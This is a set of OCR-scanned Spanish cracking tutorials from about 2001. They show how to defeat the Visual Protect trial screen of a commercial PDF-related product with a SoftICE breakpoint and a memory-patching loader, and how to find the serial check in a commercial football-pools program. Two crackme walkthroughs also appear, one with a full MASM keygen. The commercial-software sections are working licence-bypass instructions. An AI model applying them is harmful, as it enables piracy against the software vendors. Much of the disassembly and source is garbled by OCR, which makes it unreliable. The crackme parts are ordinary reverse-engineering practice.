paradoja :) 


Todo empezó cuando un buen amigo me habló de un buen programa que sirve para escribir archivos PDF, 
EasyPDF, de la misma empresa que este programa, y que realmente está bien, os recomiendo que lo compréis. No 
puedo decir lo mismo de la protección. Veremos cómo con un simple Loader podemos pasar por encima de ella. 


Para quién no lo sepa PrincessSandy es un Patcher, con él crearemos el loader. Os recomiendo que utilicéis éste, 
con otros no se puede. 


Las herramientas podéis encontarlas aquí: http://redrival.com/protools/ 


AL ATAKE 


LA PROTECCIÓN 


Tampoco he destripado mucho la protección, pero básicamente, utiliza el archivo vp.dll. Este archivo es el soporte de la 
protección. Al ejecutar el programa se crea un archivo en el directorio raiz de nuestro disco duro, llamado sysXXXXX.bin, que 
no nos interesa para nada. Luego está el archivo de licencia visualprotect.vpl, que contiene datos como número de dias de 
evaluación, etc. todo ello encriptado. 


También hay que decir, que podemos registrarnos a traves de la red, y una vez hecho esto nos envían el archivo de registro. 
que si utilizamos filemon, podemos ver que se llama visualprotect.vplr. Quizás podíamos haberlo atacado por aquí también. 
Podéis intentarlo si queréis. 


Además, el archivo principal está comprimido, al igual que parece estarlo el archivo vp.dll. 


AL ATAKE 


Pongámonos en marcha, una vez que hemos cargado Softice, iniciamos el programa y nos aparece la siguiente ventana: 


. 


Visual Protect 


isage 


Visual. 
ARONEGN 


Copyright (c) 2000, Yisage Software 


This program is protected by international copyright laws. Unathorized 
reproduction of this program will be procuted to the maximum extent 
hossible under the law. See your documentation for more information 
'Ón your license agreement. 


This application was protected using Visual Protect 
Copyright [2] 1997 2000 Visage Software. 


Mmmmm.... la ya típica ventana de Try y Buy. Vamos a Softice (Ctrl +D), en esta ocasión vamos a utilizar los handles de 
windows para encontrar algo interesante. Lo primero es conocer el nombre de nuestra tarea, nuestro programa. | ntroducimos 
en la linea de comandos de Sice, Task. Nos aparece la lista de tareas activas en nuestra maquina, podemos ver que aparece: 
Visualpr. Este es nuestro programa. Ahora necesitamos saber el handle de la ventana, para ello introducimos HWND Visualpr, 
y nos aparece algo parecido a esto: 


Window-Handle hQueue SZ QOuner ClassName 


53€ (1) 110F 32 VI SUALPRO TForm 
XXX (2) TPanel 
XXX TButton 
XXX TButton 
XXX TButton 


El handle es 53C. Ya lo tenemos todo, ahora vamos a poner el breakpoint. En la linea de comandos introducimos bmsg 53C 


wm_destroy. En un tutorial anterior recuerdo haber explicado esto un poco más, si tenéis dudas mirar por ahí. Una vez 
metido el breakpoint, volvemos a windows (F5) y pulsamos Try. Sice saltará ( quitamos los breakpoints bc*), vamos pulsando 
F12 hasta que aparezcamos en uno de los archivos que dije antes, concretamente aparecemos en VP. Ahora seguimos 
pulsando F12, pero con cuidado, atentos a cualquier cosa que pueda ser interesante. En este caso ese algo interesante, 
puede ser una llamada (un call), seguida de una comparación y ésta a s vez seguida por un salto condicional. ¿Porqué? pués 
por que, en esta ventana tenemos varios botones, cada uno de ellos devuelve un valor al programa, y el programa los 
compara, por ejemplo supongamos que al pulsar Try el valor de eax lo pone a 1 y si pulsamos Buy a 2, el programa tendrá 
que comparar el valor de eax, para saber qué botón hemos pulsado. 


Lo dicho, vamos pulsando F12 hasta que vemos algo realmente interesante: 


015F:00705041 33D2 XC XxX, EDX 

015F :00705043 CH XX, [ESP+04] 
015F:007050147 

D1SF: OSDA9 

D15F: 

D15F:007050A4D 

D15F:O0070504E 0FS5 

D15F:007050B4 41140477?000 

D1SF:007050B9 F6405902 Y [E1AX+59] ,02 
D15F:007050BD 0FSS5 NZ 00705157 


015F : D0O7050C3 Fo CA 007045FO 


D15F:007050C8  583F802 CMP EAX, 02 


D15F:D007050CB OF: 7 00705157 


O15F:007?050D1 SDS595FDFFFF - EiX, [EBP-0268] 


015F:007?050D? B2904567000 O ECX, 00705604 
O15F:007?050DC€  5B15758147000 

D15F:007?050E2 ESC1IECFOFF 

D15F: OSOE”? 

Di5F: OSOED 35B15001477?000 

D15F :007?050F3 5B12 


015F:007050FS ESSEEÍFFFF 


Bien, aparecemos en esa linea, 7050C8. Justo encima, una llamada, y debajo un salto condicional... ¡¡ Justo lo que 
buscábamos !! Ponemos un breakpoint en la llamada (bpx 7050C8), para saber si es la nuestra realmente y volvemos a iniciar 
le programa. Sice salta, justo en la llamada, si pulsamos F4 para ver lo que pasa por windows vemos que la ventana aún no 
ha aparecido. Pulsamos F10 sobre la llamada, y aparece la ventana, pulsamos Try y volvemos a Sice. Si miramos el valor de 
los registros (F2), concretamente el de eax (que es el que compara en la siguiente instrucción), su valor es 1. Si probáis a 
pulsar otros botones de la ventana, veréis que eax cambiará de valor. 


Ya estamos terminando, volvemos a iniciar el programa, nuevamente salta sice. Ahora vamos a probar un parche para la 
ventana, puesto que lo que queremos es que eax sea 1, y la llamada ocupa 5 bytes (E8 28 F8 FF FF), probamos a introducir 
la siguiente instrucción en sice con el comando A: a eip, e introducimos 'mov eax, 01' pulsamos enter un par de veces, y 
veremos que la llamada ha desaparecido y que en su lugar está la instrucción que nosotros hemos metido. Anotad sus bytes 
(B8 01 00 00 00). Ahora pulsamos F5 para ver si es válido el parche ........ !Irtt1111 ARRANCÓ EL PROGRAMA ¡iii 


EL LOADER 


Como dije antes el archivo vp.dll está encriptado o algo así, por tanto si buscamos los bytes que vimos ates, no los 
encontraremos. Para poder parchear el programa necesitamos hacerlo una vez desencritado en memoria. Para ello crearemos 
un loader con el programa PrincessSandy. Lo ejecutamos, seleccionamos el archivo que nos interesa (el ejecutable, no la dll) 
en este caso VisualProtect.exe y pulsamos Add Item, introducimos la dirección (con todos sus ceros, 8 numeros) los datos 


Sólo queda probar el loader. 


FINALIZANDO 


Bueno esto ha sido todo por esta vez, espero no haberme equivocado mucho, si encontráis cualquier error, o tenéis alguna 
pregunta no dudéis en decírmelo ( No me pidáis Cracks ¿OK? ). Espero que os haya resultado útil este tuto. No olvidéis que 
nuestro objetivo sólo es aprender. Sin contar con la diversión que esto supone por supuesto ;-)) 


Un Gran Saludo para todos los miembros de [K-FoR], para los amigos de Tutoriales 2000 y para todos vosotros. Profe animo y 
gracias por lo del | ceDump :-); Txeli, espero que te sirva de algo ;-) 


Hasta la próxima... 


« ») —==*ze-« » 


Mi correo: kuato thortdhotmail.com 


La página de [K-FoR]: http://pagina. de/kfor 


« >») —==*zeo--« » 
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A 


E E 


INTRODUCCION 


Bueno antes que nada decir que es mi primer tutorial, mi primer Keygen, espero que no se complique la 
cosa y nos entendamos todos. Al ser el primer Keygen que hago, vereis que en el código hay cosas inútiles 
además de estupidas, ya iremos mejorando ;). Este crackme me desconcertó al principio, pues tiene rutinas 
antidebugger, el fileinspector no nos dice nada concreto, nos da error al intentar abrirlo con el procdump, 
pero cuando utilizamos el ataque adecuado es bastante sencillo. 


AL ATAKE 


Vamos a ello, ejecutamos el crackme y nos da un MessageBoxA con el titulo de ERROR! y Debugger detected cuando 
tenemos el Softice (SI ) cargado, bueno pues vale, ponemos un bpx messageboxa y ejecutamos de nuevo,bien SI 
rompe, le damos a F12 y nos sale el messageboxa, le damos a aceptar y ¿qué pasó?, en vez de caer en el código nos 
envia directamente a ExitProcess y nos saca del programa, bueno tampoco pasa nada pasamos al primer enfoque de 
ataque: 


1 forma: Ponemos el bpx messageboxa y esperamos que rompa SI, vale ahora buscamos el texto de la ventana, 
ponemos S_30 | ffff1If "ERROR" y nos aparece en 406632, vale ya tenemos una via de entrada, no podemos ponerle un 
bpx debido a la rutina antibreakpoints que utiliza, pero podemos usar un Bpm 406632 RW, salimos ejecutamos el 
crackme y nos rompe en plena rutina descompresora, ahora estamos en el codigo y lo vamos traceando, vemos como se 
descomprimen las lineas siguientes a la vez que avanzamos, al principio intente eliminar la rutina antibpx buscando las 
referencias a INT3 (CC), pero al final me cansé debido a la descompresión larga y tediosa, cargué el ICEDUMP y , 
sorpresa, el programa arranca, asi que pasamos a la 2 forma. 


2 forma: Bueno ahora ya tenemos el programa cargado y listo para meter nuestro serial, podriamos intentar poner un 
bpx getdlgitemtexta, pero salta la detección del SÍ, una solución bastante válida seria; una vez cargado el crackme 

pasamos a SI ponemos , hwnd crackme, nos aparecen varias columnas, nos fijamos que en la de la derecha donde pone 
"Class name” hay tres button (botones), y en la de la izquierda donde pone Window handle pues el handle del boton, 


vamos a coger el primero 0358 (el handle va a variar cada vez que ejecutamos el programa), y ponemos un , bmsg 0358 
wm_command, esto pone un bpx de mensaje cuando activemos ese boton, salimos al programa, le damos al boton y 
rompemos en Sl y despues de varios F12 estamos en pleno codigo (en mi caso no pone nada en la línea del SI) y 
bastante cerca, caminamos hacia arriba y vamos viendo el messageboxa de niño bueno y el getdlgitemtexta que coge 
los datos. Bueno, vamos a dejarnos de boberias ya que sabemos que usa getdlgitemtexta y que no le gustan los bpx a 
esa api, nos vamos al SI y ponemos , u getdlgitemtexta, con esto nos muestra el codigo de la api en user32, le ponemos 
un bpx a una de las primeras líneas por ejemplo a la que pone, PUSH EBP, salimos metemos el nombre y el serial 
damos al boton y aparecemos en SI en user32 damos a F12 y estamos en pleno código bueno justo despues del 
getdlgitemtexta del nombre, traceamos un poco pero ojo, te acuerdas de que también habia rutina antitraceo, si le 
damos a F10 nos manda para fuera, asi que a F8, que tampoco hay calls largos ni nada, pasamos el getdlgitemtexta del 
serial, y vemos que el codigo tiene unas lineas muy raras, pero que al pasar por el, CALL [4033EC] se descomprimen y 
aparece el codigo en cristiano, el inconveniente es que al movernos por la ventana de codigo vuelve a aparecer el 
codigo raro, tampoco pasa nada seguimos el proceso para obtener el serial con paciencia, pero comprenderas que no te 
muestre el codigo entero, no?, de todas formas el codigo del keygen es casi igual solo varian las direcciones de 
memoria utilizadas . Primero obtiene el numero de caracteres del nombre y ve si está entre 6 y 30, luego compara el 
serial que debe ser de 12 cifras, comprueba que la quinta cifra sea un guion haciendo un xor de 52 con 7f (da 2D = a un 
guion) para despistar, comprueba que la octava cifra sea tambien un guion, si no se cumple alguna de estas 
comprobaciones nos da un messageboxa de Oh, oh invalid code, y después empieza lo duro, coge el nombre y va 
haciendo sumas y operaciones letra a letra, va sumando, desplaza, lo mueve, lo vuelve a sumar, lo vuelve a mover, lo 
mejor es echar un vistazo al codigo del keygen, al final va comparando número a número con nuestro serial 
despreciando la cuarta cifra y las dos últimas. Bueno ahí va el codigo del keygen para masm32, creo que no es muy 
complejo, si algo no se entiende seguramente es que no deberia estar ahí, je je .. 


RSRC.RC 

ttinclude "resource.h" 

ttdefine IDC_EDIT 3000 
ttdefine IDC_BOTON 3001 
ttdefine IDC_SALIR 3002 
ttdefine IDC_ACERCA 3003 
ttdefine IDC_STATIC -1 
ttdefine IDM_BORRAR 32001 


ttdefine IDM_SALIR 32003 


500 ICON DISCARDABLE "GALL.ICO" 


MyDialog DIALOG 10, 10, 205, 70 

STYLE 0x0004 | DS_CENTER | WS_CAPTION | WS_MINIMIZEBOX | 

WS_SYSMENU | WS_VISIBLE | WS_OVERLAPPED | DS_MODALFRAME | DS_3DLOOK 
CAPTION "Keygen para Crackme de Txotxo" 


FONT 8, "MS Sans Serif" 


CLASS "DLGCLASS" 

BEGIN 

EDITTEXT 3000, 15,17,111,13, ES_AUTOHSCROLL | ES_LEFT [WS_TABSTOP 
DEFPUSHBUTTON "Calcular", 3001, 150,6,40,13 
PUSHBUTTON "Salir", 3002, 150,22,40,13 
PUSHBUTTON "Acerca", 3003, 150,38,40,13 
GROUPBOX "Pon el nombre", -1, 10,3,121,37 
END 

MyMenu MENU 

BEGIN 

POPUP "Funciones" 

BEGIN 

MENUITEM "é¿Calcular", 32000 

MENUITEM "á£Borrar", 32001 


MENUITEM "", , 0x0800 /*MFT_SEPARATOR*/ 


MENUITEM "ézSalir", 32002 
END 


END 


KEYGEN.ASM 


-386 

.model flat,stdcall 

option casemap:none 

WinMain proto :DWORD,:DWORD,:DWORD,:DWORD 
include iÍmasm32úincludelwindows.inc 


include Ímasm32Wincludeluser32.inc 


include imasm32úincludelkernel32.inc 

includelib masm32Vibluser32.lib 

includelib imasm32Viblkernel32.lib 

«data 

ClassName db "DLGCLASS",0 

MenuName db "MyMenu",0 

DlgName db "MyDialog",0 

AboutName db "Acerca de !!!JNP",0 

acerca db "Este es mi primer Keygen, gracias Txotxo,",10,13 
db "con este Crackme he aprendido mucho.",0 

AppName db "Keygen para Crackme de Txotxo",0 
TituloSerial db "Keygen por !!!JNP",0 

mensajel db "El nombre debe tener entre 6 y 30 caracteres",0 


texto db "0123456789 ABCDEF¡",0 


«data? 

hwndDlg dd ? 

hInstance HINSTANCE ? 
CommandLine LPSTR ? 
nombre db 31 dup(?) 
icono dd ? 

temp dd ? 

enmedio db 4 dup(?) 
temp6 dd ? 

enmedio db 4 dup(?) 
temp2 dd ? 

enmediol db 4 dup(?) 


temp3 dd ? 


enmedio2 db 4 dup(?) 

temp4 dd ? 

enmedio3 db 4 dup(?) 

temp3 dd ? 

enmedio4 db 4 dup(?) 

resultado dd ? 

Const 

IDC_EDIT equ 3000 

IDC_BOTON equ 3001 

IDC_SALIR equ 3002 

IDC_ACERCA equ 3003 

IDC_STATIC equ -1 

IDM_CALCULAR equ 32000 
IDM_BORRAR equ 32001 

IDM_SALIR equ 32002 

.code 

start: 

invoke GetModuleHandle, NULL 

mov hInstance,eax 

invoke GetCommandLine 

invoke WinMain, hInstance, NULL,CommandLine, SW_SHOWDEFAULT 
invoke ExitProcess,eax 

WinMain proc hInst:HINSTANCE, hPrevInst: HINSTANCE,CmdLine:LPSTR,CmdShow:DWORD 
LOCAL we:WNDCLASSEX 

LOCAL msg:MSG 

LOCAL hDlg:HWND 

mov wc.cbSize,SIZEOF WNDCLASSEX 


mov wc.style, CS_HREDRAW or CS_VREDRAW 


mov wc.IpftnWndProc, OFFSET WndProc 

mov wc.cbCIsExtra,NULL 

mov wc.cbWndExtra DLGWINDOWEXTRA 

push hInst 

pop wc.hInstance 

mov wc.hbrBackground,COLOR_BTNFACE+1 

mov wc.IpszMenuName, OFFSET MenuName 

mov wc.lpszClassName,OFFSET ClassName 

invoke LoadIcon,hInstance,500 

mov wc.hIcon,eax 

mov wc.hIconSm,eax 

mov icono,eax 

invoke SendMessage,hDlg, WM_SETICON,ICON_BIG,icono 
invoke LoadCursor,NULL,IDC_ARROW 

mov wc.hCursor,eax 

invoke RegisterClassEx, addr wc 

invoke CreateDialogParam,hInstance, ADDR DlgName,NULL,NULL,NULL 
mov hDlg,eax 

invoke GetDlgltem,hDlg,IDC_EDIT 

invoke SetFocus,eax 

INVOKE ShowWindow, hDlg,SW_SHOWNORMAL 
INVOKE UpdateWindow, hDlg 

.WHILE TRUE 

INVOKE GetMessage, ADDR msg,NULL,0,0 
.BREAK .IF (leax) 

invoke IsDialogMessage, hDlg, ADDR msg 

.1f eax==FALSE 


INVOKE TranslateMessage, ADDR msg 


INVOKE DispatchMessage, ADDR msg 

.endif 

.ENDW 

mov eax,msg.wParam 

ret 

WinMain endp 

WndProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, IParam:LPARAM 
.1ifuMsg==WM_CREATE 

invoke SetDlgltemText,hWnd,IDC_EDIT,ADDR AppName 
.ELSEIF uMsg==WM_DESTROY 

invoke PostQuitMessage,NULL 

.ELSEIF uMsg==WM_COMMAND 

mov eax,wParam 

IF IParam== 

.IF ax==IDM_CALCULAR 

calcula: 

invoke GetDlgltemText,hWnd,IDC_EDIT, ADDR nombre, 31 
pushad 

XOr €CX,eCx 

mov ebx,offset nombre 

aqui: 

mov al, [ecx+nombre] 

cmp al,00 

jz O 

inc ecx 

cmp ecx,1Eh 


jnz aqui 


o: 

cmp ecx,06h 

jb errorl 

mov ebx, offset temp 
xor eax,eax 

mov esi, offset temp2 
mov edi, offset nombre 
Ol: 

mov al, [edi] 

shl eax,02h 

add [esi],eax 

add [ebx],eax 

inc edi 

cmp byte ptr [edi],00h 
jnz Ol 

rel dword ptr [esi],05h 
rel dword ptr [ebx],09h 
mov edx,[ebx] 

add edx,[esi] 

mov ecx,offset temp2-5 
mov [ecx],edx 

mov esi,offset temp2-19 
mov ax,[ecx] 

mov [esi],ax 

add ecx,02 

mov esi,offset temp2-14 
mov ax,[ecx] 


mov [esi],ax 


mov esi,offset temp2-14 
xor eax,eax 

mov ah,[esi+01] 

mov esi,offset temp2-19 
add ah,[esi] 

rcl eax,Och 

mov esi,offset temp6 
mov [esi],ah 

xor eax,eax 

mov ecx, offset temp2-19 
mov edx,02h 

mov edi, offset texto 
mov esi,offset temp3 
push segundo 

j¡mp E2 

segundo: 

xor eax,eax 

mov ecx, offset temp2-14 
mov edx,02h 

mov edi, offset texto 
mov esi,offset temp4 
push tercero 

jmp E2 

tercero: 

xor eax,eax 

mov ecx, offset temp6-1 
mov edx,02h 


mov edi, offset texto 


mov esi,offset temp5 
push sigue 

jmp 2 

(02: 

mov ah, [ecx] 

shr ah,04h 

shr eax,08h 

mov bh,[edi+eax] 
mov [esi],bh 

xOr eax,eax 

mov ah, [ecx] 

shl eax,14h 

shr eax,1ch 

mov bh,[edi+eax] 
mov [esi+01],bh 

inc ecx 

add esi,02h 

dec edx 

jnz 2 

pop eax 

jmp eax 

sigue: 

mov edi, offset temp3 
mov esi,04h 

mov eax,offset resultado 
(03: 

mov cl, [edi] 


mov [eax],cl 


inc eax 

inc edi 

dec esi 

jnz 03 

mov b1,2dh 
mov [eax],bl 
mov esi,02h 
(04: 

mov cl,30h 
inc eax 

mov [eax],cl 
dec esi 

jnz 04 

inc eax 

mov bl,2dh 
mov [eax],bl 
mov edi,offset temp3+8 
mov esi,04h 
OS: 

mov cl, [edi] 
inc edi 

inc eax 

mov [eax],cl 
dec esi 

jnz OS 

mov eax,offset temp 


mov edi,offset temp2 


mov ebx,offset temp3 

mov ecx, offset temp4 

mov edx,offset temp5 

mov esi,00000000h 

mov [eax],esi 

mov [edi],esi 

mov [ebx],esi 

mov [ecx],esi 

mov [edx],esi 

popad 

jmp noerror 

errorl: 

invoke MessageBox,NULL,ADDR mensajel,ADDR TituloSerial, MB_OK 
jmp borrar 

noerror: 

invoke MessageBox,NULL,ADDR resultado, ADDR TituloSerial, MB_OK 
.ELSEIF ax==IDM_BORRAR 

borrar: 

invoke SetDlgltemText,hWnd,IDC_EDIT,NULL 
.ELSE 

invoke Destroy Window,hWnd 

.ENDIF 

.ELSE 

mov edx,wParam 

shr edx,16 

.IF dx==BN_CLICKED 

.IF ax==IDC_BOTON 


jmp calcula 


.ELSEIF ax==IDC_SALIR 
invoke SendMessage,hWnd, WM_COMMAND,IDM_SALIR,0 
.ELSEIF ax==IDC_ACERCA 


invoke MessageBox,NULL,ADDR acerca, ADDR AboutName,MB_OK 


.ENDIF 

.ENDIF 

.ENDIF 

.ELSE 

invoke DefWindowProc,hWnd,uMsg,wParam,lParam 
ret 

.ENDIF 

xor eax,eax 

ret 

WndProc endp 


end start 


He probado con todos los nombres que se me han ocurrido y siempre ha salido OK. 


Espero que se haya entendido, explicar el Keygen ya seria otro tutorial, cualquier duda : 
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Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD: 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 2001 
| CEFORTRESS cracklWE level 1 - l|evell. exe 


Serial. 

Buscar un Numero de Serie valido 
CrackME 

NULA - [ SUPERNEVBI El] 


ww. i|cefortress. com 


Softice - Micho cerebro - (Un pokillo de suerte) 
rulzgz FECHA: 20/02/2001 


INTRODUCCION 


Este es mi primer tutorial (y espero ke no el ultimo), La verdad ke yo soy un newbie, probablemente mucho mas ke algunos de los ke lean este 
tute, asi ke si alguien kon un poko mas de experiencia ke yo en el asunto lee esto y ve algun fallo, o simplemente kree ke puede mejorarlo, k me 
lo komunike por email a rulzgz(teleline.es. Pero recordad ke esta echo por y para NEWBIES. 


Pues dicho esto vamos al tajo :) 


Se trata de un programa echo por el grupo ICEFORTRESS cuya unika finalidad es ser crackeado :), este es el de nivel 1, en kuanto konsigues 
crackearlo te dan la URL para el crackme de siguiente nivel. Pero en este caso se han tomado muy poco empeño en protegerlo, o es un fallo del 
programador, no sé. 


AL ATAKE 


La verdá es ke descubrí la forma de crackear este programa con un poko de koña, ahora os lo explicaré: En algun tute leí ke a veces los inkautos 

programadores antes de hacer la comparación entre un kodigo malo(el nuestro) y uno bueno(el real) guardaban ambos en posiciones de memoria 

muy cercanas, con lo kual solo hay k buskar nuestro password o nombre de usuario en la memoria y si habia suerte por al lao habia un numero ke 
resultaba ser el bueno :). Ahora lo expliko. 


En primer lugar se rellena las dos casillas ke hay al ejekutar el programa, en mi caso puse: 


NAME: rulzgz 
SERIAL: 666999666 


Muy bien, ahora simplemente entramos en el Softice (CRTL + D) y escribirmos: 
bpx hmemcpy 


Regresamos a windows pulsando F5, mu bien, kuando pulsemos el boton register en el crackme saltara el softice. Pero todavia no estaremos 


instrucciones en ensamblador (*NOTA* Os recomiendo muy seriamente a todos los ke empezeis, ke es MUY konveniente saber algo de 
ensamblador antes de empezar a crackear, os lo digo como propia experiencia, ke si no se sabe ASM kuesta MUCHO mas) vais 


traceando un poco con F10 cuando creais que el mensaje de error esta a punto de aparecer (bueno, vais provando si no sale tracear un poco mas 
con F10) escribir: 


S 30 L FFFFFF "666999666" 


En vuestro caso escribid vuestro codigo en vez de 666999666 :) y en una de las ventanas del Softice en la parte de la derecha aparecera vuestro 
nombre y vuestra clave y justo debajo un extraño numero como este (en mi caso): 


114117108122103122 


Y.... efectivamente al salir y poner vuestro nombre y ese codigo el programa os dice la URL para encontrar el crackme del siguiente nivel :) Muy 
bien Ahora ya lo teneis "crackeado" pero aún vamos a ir un poco mas lejos :), fijaros en el kodigo y en vuestro nombre : 


114 117 108 122 103 122 
r u | z g z 


¿No hay algo raro? :) probemos con distintos nombres: 


zgzgz9g=> 122 103 122 103 122 103 
rrruuu=>114 114 114117 117 117 


Parece ke nuestras sospechas estan fundadas :) y si efectivamente para calcular la clave para nuestro nombre simplemente sustituye cada letra 
de nuestro nombre por un numero predefinido :) umm curioseemos un poko mas: 


abcdef=> 97 98 99 100 101 102 
ghijk!l=> 103 104 105 106 107 108 
mnopqr=>109 110 111 112113114 
stuvwx=>115116 117 118 119 120 
yz1234=> 121 122 49 50 51 52 
567890=> 53 54 55 56 57 58 


Introduciendo unos kodigos komo estos (o todos de vez) obtendremos la ekivalencias de todo el abecedario ke son las siguientes: 


abcd e f g h ¡ jj k |m n op q r s tu v w x yz 1234567890 


97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 49 50 51 52 53 54 55 56 57 58 


Ke os pareceria hacer un KEYGEN Pos ¡o kreo ke kon estos datos, y kon algo ke sepais de programación facilmente lo podréis hacer :) ya ke este 
crackME va tomando los caracteres del nombre uno a uno y los va sustituyendo por los correspondientes numeros preestablecidos. Si alguien se 
anima y lo hace, ke me lo pase a rulzgzGOteleline.es 


Bueno pos espero ke os haya sido util y ameno este tutorial para kualkier sugerencia, duda, felicitacion, abucheo, etc... plz escribirme a 
rulzgz(teleline.es 


-=[SALUDOS]=- 


M.Silver/WkT - Por ayudar re y aguantarme tantos y tantos di as 
Karpoff - Profesor X - Por la gran labor ke estan haciendo recopilando tutes 
A toda la gente ke escribe tutes par NEVBI ES en kastel | ano 
A toda la gente de los kanal es +HAtrio y +*Crackers del |RC- HI SPANO 
Y a toda la gente del desaparecido *Sexnet (el ¡ntecanmbio de passwords es ¡legal segun los ADM MN del 
hispano pero pa m ke si mpl emente son unos FASCISTAS y k en su red no hay libertad de expresi on) 
Al + KOMANDO + PARRA + - Albrto - Th3_Crow- Snaper - Vébon - etc.. 


[ E+0+F] 


E2001 :: RuL :: rulzgzGtreleline. es 
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Programa: 


Karpoff Spanish Tutor 


1X2-WinPro 3.2.0 Profesional 


PROTECCION: Serial. 

Objetivo: Obtención del serial, o simular estar registrados. 

Descripcion: Para hacer quinielas 

Dificultad: Muy facil. 

DOWNLOAD : http:// [lo siento no me acuerdo] 

Herramientas: Softice 3.xx, W32dasm. 

CRACKER: kamui FECHA: 5/4/2001 
INTRODUCCION 


Hey, hola otra vez, vengo a presentarles otro programa para ver k sistema de protección tiene ( bastante malo la verdad ). Es un 
programa para hacer las quinielas de fútbol (a lo k llega la desesperación de ser rico....). 

Es uno de los programas actuales y además dicen k da buenos resultados, todavía no lo he probao, pero seguro k lo hago.... 

La direccion de donde me la bajé, pues no me acuerdo pero en cualquier buscador yo creo que lo encontrareis facilmente. 

Bien comenzamos el atake. 


AL ATAKE 


Bueno a simple vista sabemos k el objetivo está hecho en Visual Basic ( debido a los archivos k copia ).Bien como siempre lo vamos a 
desensamblar mediante el W32Dasm para VB, podría hacerse tambien con el Smartcheck pero, eso es otro tutorial..... 


Al desensamblar, vemos: 


:005E0382 F7DF neg edi 
:005E0384 1BFF sbb edi, edi 
:005E0386 47 inc edi 
:005E0387 F7DF neg edi 


* Reference To: MSVBVMG60.__ vbaFreeStr, Ord:0000h 


| 
:005E0389 FF1550134000 Call dword ptr [00401350] 


:005E038F 8D4DB8 lea ecx, dword ptr [ebp-48] 


* Reference To: MSVBVM60.__vbaFreeObj, Ord:0000h 


| 
:005E0392 FF154C134000 Call dword ptr [0040134C]Aki el Chekeo,, ¿serial introducido=serial bueno? 
:005E0398 6685FF test di, di==>flag=0=>comparación ERRONEA 


:005E039B 0F84A8000000 je 005E0449==>Salta si la comparación es Erronea=> serial no correcto! 
:005E03A1 8B55D8 mov edx, dword ptr [ebp-28] 
:005E03A4 52 push edx 


* Possible StringData Ref from Code Obj ->"Final" 


| 
:005E03AS5 6814474500 push 00454714 


* Possible StringData Ref from Code Obj ->"SAPIDLL" 


| 
:005EO3AA 6850874500 push 00458750 


* Possible StringData Ref from Code Obj ->"API Seccion" 


| 
:005E03AF 6834874500 push 00458734 


* Reference To: MSVBVM60.rtcSaveSetting, Ord:02B2h 


:005E03B4 FF1508104000 Call dword ptr [00401008] 

:005E03BA B904000280 mov ecx, 80020004 

:005E03BF B80A000000 mov eax, 0000000A 

:005E03C4 894D80 mov dword ptr [ebp-80], ecx 

:005E03C7 894D90 mov dword ptr [ebp-70], ecx 

:005E03CA 894DA0 mov dword ptr [ebp-60], ecx 

:005E03CD 8D9538FFFFFF lea edx, dword ptr [ebp+FFFFFF38] 

:005E03D3 8D4DAS lea ecx, dword ptr [ebp-58] 

:005E03D6 C605D066610000 mov byte ptr [006166D0], 00 

:005E03DD 898578FFEEFE mov dword ptr [ebp+FFFFFF78], eax 

:005E03E3 894588 mov dword ptr [ebp-78], eax 

:005E03E6 894598 mov dword ptr [ebp-68], eax 

:005E03E9 C78540FFFFFF40A74500 mov dword ptr [ebp+FFEFFF40], 00454740 
:005E03F3 C78538FFFFFFO8000000 mov dword ptr [ebp+FFFFFF38], 00000008 


* Reference To: MSVBVM60.__vbaVarDup, Ord:0000h 
| 

:005E03FD FF15D4124000 Call dword ptr [004012D4] 
:005E0403 8D8578FEFFFF lea eax, dword ptr [ebp+FEFEFF78] 
:005E0409 8D4D88 lea ecx, dword ptr [ebp-78] 
:005E040C 50 push eax 

:005E040D 8D5598 lea edx, dword ptr [ebp-68] 
:005E0410 51 push ecx 

:005E0411 52 push edx 

:005E0412 8D45A8 lea eax, dword ptr [ebp-58] 
:005E0415 6A00 push 00000000 

:005E0417 50 push eax 


* Reference To: MSVBVM60.rteMsgBox, Ord:0253h 


| 

:005E0418 FF15C0104000 Call dword ptr [004010C0] 
:005E041E 8D8D78FFFFFE lea ecx, dword ptr [ebp+FFFFFF78] 
:005E0424 8D5588 lea edx, dword ptr [ebp-78] 

:005E0427 51 push ecx 

:005E0428 8D4598 lea eax, dword ptr [ebp-68] 

:005E042B 52 push edx 

:005E042C 8D4DAS lea ecx, dword ptr [ebp-58] 

:005E042F 50 push eax 

:005E0430 51 push ecx 

:005E0431 6A04 push 00000004 

:005E0433 FEDÉ call esi 

:005E0435 83C414 add esp, 00000014 

:005E0438 C745E4FEFFFFFE mov [ebp-1C], FFFFFFFF 
:005E043F 684E055E00 push 005E054E 

:005E0444 E9E0000000 ¡mp 005E0529==>Nos envia lejos del mensaje de ERROR! 


* Referenced by a (U)nconditional or (Cjonditional Jump at Address: 

|:005E039B(C) 

| 

:005E0449 B904000280 mov ecx, 80020004**-Si el salto se ha producido,el serial es incorrecto, caemos aki no pasamos por el salto 
anterior, y nos envia directamente al mensaje de error!-** 

:005E044E B80A000000 mov eax, 0000000A 


:005E0453 894D80 mov dword ptr [ebp-80], ecx 

:005E0456 894D90 mov dword ptr [ebp-70], ecx 

:005E0459 894DA0 mov dword ptr [ebp-60], ecx 

:005E045C 8D9538FFFFFF lea edx, dword ptr [ebp+FFFFFF38] 

:005E0462 8D4DAS lea ecx, dword ptr [ebp-58] 

:005E0465 898578 FFFEFF mov dword ptr [ebp+FFFFFF78], eax 

:005E046B 894588 mov dword ptr [ebp-78], eax 

:005E046E 894598 mov dword ptr [ebp-68], eax//Mensaje k no queremos k aparezca , jeje:// 


* Possible StringData Ref from Code Obj ->"Numero de registro NO valido" 


| 
:005E0471 C78540FFFFFF7CA74500 mov dword ptr [ebp+-FFFFEF40], 0045A77C 


:005E047B C78538FFFFFFOS000000 mov dword ptr [ebp+FFFFEFF38], 00000008 


* Reference To: MSVBVM60.__vbaVarDup, Ord:0000h 


| 
:005E0485 FF15D4124000 Call dword ptr [004012D4] 


:005E048B 8D9578FFFFFF lea edx, dword ptr [ebp+FFFFFF78] 
:005E0491 8D4588 lea eax, dword ptr [ebp-78] 


Conclusion: 


Trás ver el listado muerto con el W32DASM para VisualBasic, podemos ver el mensaje de error por la dirección 5E0471,, mirando hacia 
arriba podemos ver algo muy interesante: 


:005E0392 FF154C134000 Call dword ptr [0040134C] 
:005E0398 6685FF test di, di 
